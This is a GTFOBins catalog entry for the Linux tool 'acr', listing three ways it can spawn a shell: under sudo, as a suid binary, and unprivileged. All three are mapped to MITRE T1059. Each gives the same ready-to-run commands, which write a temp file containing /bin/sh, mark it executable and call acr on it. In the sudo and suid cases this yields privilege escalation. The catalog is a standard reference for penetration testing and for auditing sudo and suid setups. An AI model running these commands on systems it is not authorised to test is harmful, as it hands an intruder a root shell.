Catalog GTFOBins

GTFO · Tool

acr

3 techniques LinuxGTFOBins GPL-3.0

command

ExecutionPrivilege Escalation Linux
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
Context
sudo
Native
command
MITRE
T1059

command

ExecutionPrivilege Escalation Linux
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
Context
suid
Native
command
MITRE
T1059

command

Execution Linux
echo -e 'x:\n\t/bin/sh 1>&0 2>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
acr -r ./relative/path/to/temp-file
Context
unprivileged
Native
command
MITRE
T1059